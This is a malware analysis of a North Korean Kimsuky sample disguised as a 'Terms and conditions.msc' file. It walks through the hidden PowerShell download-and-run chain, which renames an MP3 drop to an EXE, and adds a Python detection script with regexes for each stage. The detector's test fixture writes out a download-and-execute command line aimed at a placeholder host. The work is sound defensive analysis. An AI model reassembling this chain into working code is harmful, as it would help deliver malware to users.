2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjang - Terms and Conditions.msc)
2024-09-10 Sakai @sakaijjang Malware made by Kimsuky - Terms and conditions (Terms of Use).msc (2024.9.6) - Kimsuky (North Korea) - Terms and Conditions.msc
by https://x.com/sakaijjang?lang=en
Article translation in English
More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus
- The malware is delivered as a file named "Terms and conditions.msc," containing embedded PowerShell commands.
- The PowerShell script is executed in a hidden window (-WindowStyle Hidden), preventing user awareness.
- The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a malicious script from hxxps://0x0(.)st/Xyl7(.)txt.
- The downloaded data, encoded in hexadecimal, is decoded into a byte array.
- The decoded data is initially saved as an MP3 file (e.g., vBqz.mp3) in the system’s public documents folder.
- The MP3 file is then renamed to an executable file (e.g., vBqz.exe), disguising the payload as a media file.
- The executable is run using conhost.exe in the background with the -NoNewWindow option, ensuring it remains hidden.
- File Camouflage: The use of the MP3 extension initially disguises the executable file.
- Stealthy Execution: Utilizing system utilities like conhost.exe and executing commands in hidden windows help evade user detection and security software.
- Command-and-Control (C2) Infrastructure: The malware’s reliance on a public site for payload distribution suggests a flexible and easily reconfigurable C2 mechanism.
- Hexadecimal Encoding: The use of encoded data indicates potential obfuscation techniques; decoding this data can reveal more about the malware.
- Potential Variants: Different versions of this malware may exist, with variations in the payload or C2 URLs. Monitoring and updating detection rules, such as YARA, would be beneficial.
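A detection-side helper, added here as an example (not code from the original post or from Sakai's analysis): it extracts the text of an MMC console (.msc) file and checks it for each stage of the chain described above, so a triage script can flag consoles that carry the whole pattern rather than any one string. The console-file layout of the fixtures, the regex spellings, the `score >= 4` threshold and the `example.invalid` URL are assumptions.

```python
import html
import re
import xml.etree.ElementTree as ET

# One regex per stage of the chain described in the write-up. The spellings are
# assumptions about common PowerShell forms, not strings taken from the sample.
STAGES = {
    "hidden_window":   r"-(?:WindowStyle|w)\s+Hidden",
    "download_cradle": r"\b(?:iwr|Invoke-WebRequest)\b.*\b(?:iex|Invoke-Expression)\b"
                       r"|\b(?:iex|Invoke-Expression)\b.*\b(?:iwr|Invoke-WebRequest)\b",
    "hex_decode":      r"\[Convert\]::ToByte\(|\[byte\[\]\]",
    "public_drop":     r"\$env:PUBLIC|\\Users\\Public\\Documents",
    "mp3_to_exe":      r"(?:Rename-Item|Move-Item|\bren\b|\bmv\b)[^\n]*\.mp3[^\n]*\.exe",
    "conhost_hidden":  r"conhost(?:\.exe)?.*-NoNewWindow|-NoNewWindow.*conhost",
}

def console_text(data: bytes) -> str:
    """Return the readable text of a .msc file: joined XML text if it parses, raw otherwise."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16")                 # BOM-prefixed console files
    else:
        text = data.decode("utf-8", errors="ignore")
    try:
        return " ".join(ET.fromstring(text).itertext())  # entities such as &quot; decoded
    except ET.ParseError:
        return html.unescape(text)                   # damaged XML: still unescape entities

def scan_msc(data: bytes) -> dict:
    """Match every stage and flag the file when most of the chain is present."""
    text = console_text(data)
    hits = {name: bool(re.search(pat, text, re.I | re.S)) for name, pat in STAGES.items()}
    hits["score"] = sum(hits.values())
    hits["verdict"] = "suspicious" if hits["score"] >= 4 else "benign"
    return hits

# Constructed fixtures (assumed MMC console-file layout). The embedded command is
# deliberately not valid PowerShell; it only carries the tokens a detector keys on.
SUSPICIOUS_MSC = r"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0"><StringTables><StringTable><Strings>
<String ID="1">powershell -WindowStyle Hidden -c &quot;$h=(iwr 'https://example.invalid/payload.txt').Content;
iex $stage; $b=[byte[]]([Convert]::ToByte(HEX_PAIR,16));
[IO.File]::WriteAllBytes(&quot;$env:PUBLIC\Documents\vBqz.mp3&quot;,$b);
Rename-Item &quot;$env:PUBLIC\Documents\vBqz.mp3&quot; vBqz.exe;
Start-Process conhost.exe -ArgumentList &quot;$env:PUBLIC\Documents\vBqz.exe&quot; -NoNewWindow&quot;</String>
</Strings></StringTable></StringTables></MMC_ConsoleFile>"""
BENIGN_MSC = r"""<?xml version="1.0"?><MMC_ConsoleFile ConsoleVersion="3.0">
<StringTables><StringTable><Strings><String ID="1">Computer Management (Local)</String>
</Strings></StringTable></StringTables></MMC_ConsoleFile>"""

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_MSC), ("benign", BENIGN_MSC)):
        print(label, scan_msc(doc.encode()))
```

Because the stages are scored together, a file that only contains a hidden-window PowerShell launch is not flagged on its own; the MP3-to-EXE rename and the conhost launch are what make the verdict specific to this chain.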
File Information
Name: Terms and conditions.msc
Size: 141 KB
MD5: 81d224649328a61c899be9403d1de92d
SHA-1: f4895809cb38fa1f225340e99c05e477a5017111
SHA-256: cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09